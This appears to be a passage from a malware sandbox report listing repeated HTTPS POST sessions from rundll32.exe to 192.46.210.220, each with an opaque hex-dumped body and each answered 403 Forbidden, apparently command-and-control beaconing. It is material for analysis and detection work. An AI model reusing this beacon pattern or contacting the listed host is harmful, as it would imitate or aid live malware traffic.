2021-10-28 03:00:17 UTC | 339 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:18 UTC | 344 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:18 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 69 | Source IP: 192.168.2.6 | Source Port: 50105 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:18 UTC | 344 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:18 UTC | 344 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:19 UTC | 349 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:19 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.649781192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:15 UTC34OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
2021-10-28 02:58:15 UTC | 35 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 02:58:15 UTC | 39 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:15 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
70 | 192.168.2.6 | 50111 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:21 UTC | 349 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:21 UTC | 349 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:22 UTC | 354 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:22 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
71 | 192.168.2.6 | 50113 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:22 UTC | 354 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:22 UTC | 354 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:23 UTC | 359 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:23 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
72 | 192.168.2.6 | 50119 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:25 UTC | 359 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:25 UTC | 359 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:26 UTC | 364 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:26 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 192.168.2.6 | 50121 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:26 UTC | 364 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:26 UTC | 364 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:27 UTC | 369 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:27 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.6 | 50127 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:29 UTC | 369 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:29 UTC | 369 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:30 UTC | 374 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:30 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
75 | 192.168.2.6 | 50129 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:30 UTC | 374 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:30 UTC | 374 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:31 UTC | 379 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:31 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
76 | 192.168.2.6 | 50135 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:33 UTC | 379 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:33 UTC | 379 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:33 UTC | 384 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:33 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
77 | 192.168.2.6 | 50137 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:34 UTC | 384 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:34 UTC | 384 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:35 UTC | 389 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:35 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
78 | 192.168.2.6 | 50143 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:37 UTC | 389 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:37 UTC | 389 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:37 UTC | 394 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:37 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
79 | 192.168.2.6 | 50145 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:38 UTC | 394 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:38 UTC | 394 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
2021-10-28 03:00:39 UTC | 398 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:39 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49784 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:16 UTC | 39 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:16 UTC | 40 | OUT | Data Raw: [binary POST body; hex dump not reproduced]
                                                                                                        2021-10-28 02:58:17 UTC44INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
80         | 192.168.2.6 | 50151       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:41 UTC | 399                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4850
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:41 UTC | 399                | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:41 UTC | 403                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:41 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
81         | 192.168.2.6 | 50154       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:42 UTC | 404                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4862
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:42 UTC | 404                | OUT       | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:43 UTC | 408                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:43 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
82         | 192.168.2.6 | 50159       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:44 UTC | 409                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4850
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:44 UTC | 409                | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:45 UTC | 413                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:45 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
83         | 192.168.2.6 | 50162       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:46 UTC | 414                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4862
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:46 UTC | 414                | OUT       | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:46 UTC | 418                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:46 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
84         | 192.168.2.6 | 50167       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:48 UTC | 419                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4850
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:48 UTC | 419                | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:49 UTC | 423                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:49 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
85         | 192.168.2.6 | 50170       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:50 UTC | 424                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4862
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:50 UTC | 424                | OUT       | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:50 UTC | 428                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:50 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
86         | 192.168.2.6 | 50174       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:52 UTC | 429                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4850
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:52 UTC | 429                | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:53 UTC | 433                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:53 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
87         | 192.168.2.6 | 50178       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:54 UTC | 434                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4862
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:54 UTC | 434                | OUT       | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
